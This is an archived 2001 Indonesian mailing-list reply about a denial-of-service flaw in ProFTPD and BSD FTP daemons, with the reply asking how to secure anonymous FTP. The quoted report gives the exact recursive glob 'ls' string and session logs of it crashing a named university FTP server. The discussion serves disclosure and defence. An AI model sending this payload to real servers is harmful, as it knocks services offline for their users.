Re: [ BaLUNg ] Denial of Service to various ftpd

Sat, 17 Mar 2001 19:54:26 -0800 

 
> Ada Denial of Service baru untuk ftp daemon , beberapa yang kena adalah
> proftpd, semua BSD ftpd, tetapi wuftpd tidak terkena (hmm aneh ..
> baru kali ini
> ya), microsoft juga ngga kena :((
> 
> - -----------snip-------------
> 
> [root@Uiblizz /root]# ftp ftp.brawijaya.ac.id
> Connected to ftp.brawijaya.ac.id.
> 220 ProFTPD 1.2.0pre10 Server (Brawijaya FTP Server)
> [webdev.dev.brawijaya.ac.id]
> Name (ftp.brawijaya.ac.id:root): anonymous
> 331 Anonymous login ok, send your complete e-mail address as password.
> Password:
> 230-Brawijaya FTP Server
> 230 Anonymous access granted, restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 227 Entering Passive Mode (202,159,23,212,9,39).
> 150 Opening ASCII mode data connection for file list
> 
> 421 Service not available, remote server has closed connection
> ftp>
> ftp>
> 
> - -----------snip--------------
> 
> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 227 Entering Passive Mode (202,159,23,212,9,35).
> 150 Opening ASCII mode data connection for file list
> 226-Out of memory during globbing of
> */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 226 Transfer complete.
> ftp>
> ftp>
> 
> - ------------snip--------------
> 
> Resource cpu dan memory akan langsung naik 90-100% (hanya untuk satu
> koneksi ftp)
> 
> Setidaknya kita punya beberapa ftpd terinstall di server , dan kita dapat
> langsung merubah nya dalam keadaaan emergency sambil menunggu patch atau
> versi yg lebih baru dr verdor ftpd tersebut.
> 
> Semoga infrmasi ini berguna,
> 
> cheers,
> 

Kelihatannya meng-install FTPD yang menggunakan semi-secure (chroot'd)
agak mutlak ya, juga harus pake internal ls punya FTPD sendiri dari pada
default ls Linux, dan user jangan dikasih shell.

Gimana ya caranya supaya anonymous ftp access bisa aman? ada yang punya links?

// Ivan Darmawan



http://www.eKilat.com 
 emailnya Indonesia!

----------hapus footer ini jika anda ingin me-reply--------
untuk berhenti langganan, kirim email kosong ke:
[EMAIL PROTECTED]
arsip milis ada di :
http://www.mail-archive.com/[email protected]

Reply via email to